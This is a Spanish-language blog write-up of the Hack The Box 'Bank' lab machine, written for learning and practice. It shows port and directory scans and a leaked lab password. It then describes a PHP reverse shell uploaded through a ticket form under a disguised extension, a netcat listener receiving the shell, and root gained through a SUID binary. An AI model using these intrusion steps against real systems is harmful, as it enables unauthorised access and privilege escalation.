Entrada

Bank

Publicado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
3 min de lectura
Bank

Bank Linux · Easy - Adventure mode

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

┌──(pmartinezr㉿kali)-[~/htb/bank]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.29.200
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-14 19:31 +0100
Nmap scan report for 10.129.29.200
Host is up (0.049s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.16 seconds

bank_login

Es la web de un banco, lo mínimo es tener un login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 207628
Output File: /home/pmartinezr/reports/http_bank.htb/_26-02-15_18-55-13.txt
Target: http://bank.htb/
[18:55:14] Starting:
[18:55:15] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/
[18:55:16] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[18:55:23] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[19:02:57] 403 -  288B  - /server-status
[19:14:07] 301 -  314B  - /balance-transfer  ->  http://bank.htb/balance-transfer/

Con Dirsearch se descubren varios directorios interesantes siempre que uses el diccionario correcto. balance-transfer es posiblemente el más interesante.

bank_encrypt_fail

Un fallo de encriptación descubre a un usuario

1
2
3
4
5
6
7
8
9
10
11
12

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

bank_christ_account

Ahora podemos entrar en la cuenta de Chris.

bank_debug

Si inspeccionamos la web de tickets descubrimos un vector muy obvio de ataque. Así que solo tenemos que crear un archivo revershell.php y renombrarlo a revershell.htb.

bank_reveshell_revshell.com

Vuelvo a hacer uso de https://www.revshells.com/

bank_ticket_success

La página indica que el ticket se ha creado.

bank_tickets_sent

Y el ticket aparece en la lista My tickets

👽 Acciones:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

┌──(pmartinezr㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.29.200] 37686
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
21:06:47 up  1:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1088): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/$ ls -ltr /home/chris/
total 4
-r--r--r-- 1 chris chris 33 Feb 15 19:34 user.txt
www-data@bank:/$ cat /home/chris/user.txt
a6c2661c3c8bcb6c********
www-data@bank:/$ find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/$ /var/htb/bin/emergency
# whoami
root

El archivo de user es accesible desde el usuarioi www-data por lo que conseguir la primera bandera es algo trivial. Por otro lado al buscar posibles vías de escalada con el comando find / -perm -u=s -type f 2>/dev/null descubro un binario que al ejecutarlo nos convierte en root.

achivement

writeup, hackthebox
hackthebox bank
Esta entrada está licenciada bajo CC BY 4.0 por el autor.